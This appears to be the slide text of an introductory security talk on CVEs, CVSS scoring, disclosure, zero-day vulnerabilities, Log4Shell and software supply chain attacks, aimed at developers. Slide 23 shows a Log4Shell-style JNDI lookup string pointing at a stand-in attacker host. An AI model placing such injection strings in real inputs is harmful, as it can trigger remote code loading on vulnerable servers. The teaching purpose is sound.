The document discusses cybercrime costs predicted to reach $8 trillion annually by 2023. It defines insider threats, software vulnerabilities, and the economics of fixing security issues. It also covers common vulnerability and exposure identifiers, zero-day vulnerabilities, and the responsible disclosure process. The need for adequate security staffing and practices for developers like dependency management and a fast release cycle are also addressed.

1. The Unfolding Of A Zero Day Attack
CVE 101
Theresa Mammarella

2. THERESA MAMMARELLA
• Software Engineer @ IBM
• Eclipse OpenJ9 JVM
• Open source developer, community
member, and speaker
@t_mammarella
linkedin.com/in/tmammarella

3. $8 TRILLION
In 2023, the global annual cost of cyber crime is
predicted to top
Source: Security Intelligence

4. IF CYBERCRIME WAS A
COUNTRY (BY GDP)
China: $14.72 Tr.
Cybercrime: $8.0 Tr.
Japan: $5.06 Tr.
Germany: $3.85 Tr.
United States: $20.89 Tr.
Canada: $1.64 Tr.
Italy: $1.89 Tr.
France: $2.63 Tr.
India: $2.66 Tr.
United Kingdom: $2.67 Tr.
Source: globalpeoservices.com/top-15-countries-by-gdp-in-2022

6. INSIDER THREAT
The potential for an insider to use their authorized access or understand of an
organization to harm that organization
• When an engineer is compromised by outside influence or dissatisfaction
• When an engineer is poorly trained
• When engineers put backdoors into a product
• When remote development systems are not secured or when protections are
removed
• When accounts and credentials for terminated or inactive personnel remain
available.
Source: media.defense.gov/2022/Sep/01/2003068942/-1/-1/0/ESF_SECURING_THE_SOFTWARE_SUPPLY_CHAIN_DEVELOPERS.PDF

7. OUTNUMBERED SECURITY STAFF LEAVES
SOFTWARE VULNERABLE
AppSec Developers

8. Source: testbytes.net/blog/what-is-a-software-bug
ECONOMICS OF FIXING A SECURITY CONCERN
Time
Cost
of
fix

9. AGENDA
1 SECURITY BASICS
2 VULNERABILITY TRACKING
3 DISCLOSURE PROCESS
4 SECURITY PRACTICES FOR
DEVELOPERS

10. THE BASICS
Vulnerability
Threat
Risk

11. THE BASICS
Vulnerability
Threat
Risk
x

12. COMMON VULNERABILITIES AND
EXPOSURE (CVE)
Description
Year
ID
References

13. NATIONAL VULNERABILITY
DATABASE

14. CVSS SCORE
METRICS

15. SCORING CONTEXT
MATTERS
CVE-2023-36844 (CVSS 5.3)
+
CVE-2023-36845 (CVSS 5.3)
+
CVE-2023-36846 (CVSS 5.3)
+
CVE-2023-36847 (CVSS 5.3)
=
CVSS 9.8
(Critical)

19. SO WHAT IS THE BEST
WAY TO TALK ABOUT
VULNERABILITIES?
• Private disclosure
• Coordinated (responsible) disclosure
• Full (Public) disclosure

20. ZERO DAY
VULNERABILITY
Security bug or flaw
which is either unknown
to the vendor does not
have an official patch.

22. The Zero Day Window is Closing
Source: Adapted from IBM X-Force / Analysis by Gartner Research (September 2016)
Year of Date Reported
2006 2007 2008 2009 2010 2011 2012 2013 2104 2015
10
20
30
40
50
0
Average
Days
from
Public
Disclosure
to
Exploit
Average
45
15
2017 2019 2021
Struts2

23. logger.info(“{}”, jndi:ldap://evil.badguys);
LOG4J
LOG4SHELL AND REMOTE
CODE EXECUTION
System Loader
JDNI Loader
http://badserver.com

24. CVE-2021-44228
(AKA LOG4SHELL)
• Coordinated disclosure
• Incomplete fix
• More CVE's follow

25. WHAT'S THE DIFFERENCE BETWEEN THESE LINES
OF CODE?

26. CVE-2022-3786 AND CVE-2022-3602

27. MOST OF THESE STORIES
ARE UNTOLD
Jeremy Long, founder of the
OWASP Dependency Check
project speculates that "only
25% of organizations report
vulnerabilities to users, and
only 10% of vulnerabilities are
reported as Common
Vulnerabilities exposure (CVE)."
Sonatype State of the Software Supply Chain Report 2019

28. Security Practices for
Developers

29. HOW DO I DISCLOSE A VULNERABILITY IN A
RESPONSIBLE WAY?
• Company website
• Security files on servers
• SECURITY.md
• Github private vulnerability reporting

32. SOFTWARE
DEPENDENCIES
Dependencies
Dev Tools
Applications

33. TYPES OF SUPPLY CHAIN ATTACKS
• Typosquatting
• Open source repo attacks
• Build tool attacks
• Dependency confusion
curl
vs
cyrl
internalpkgname @ v1
internalpkgname @ v99999

34. HOW FAST IS YOUR
RELEASE PROCESS?
Sonatype: State of the Software Supply Chain 2022

35. SECURITY
CHAMPION

36. RECAP
• Vulnerability x Threat = Risk
• CVE’s, CVSS, disclosure process
• The Mantra/OWASP Top 10
• Dependency management
• Release speed
• Security champion programs

38. THANK YOU
Longhorn PHP!
• Linux Foundation free course
Developing Secure Software
https://training.linuxfoundation.org/training/devel
oping-secure-software-lfd121/
• OWASP’s list of Free for Open Source
Application Security Tools
https://owasp.org/www-
community/Free_for_Open_Source_Application_S
ecurity_Tools
@t_mammarella
linkedin.com/in/tmammarella
KEEP IN TOUCH: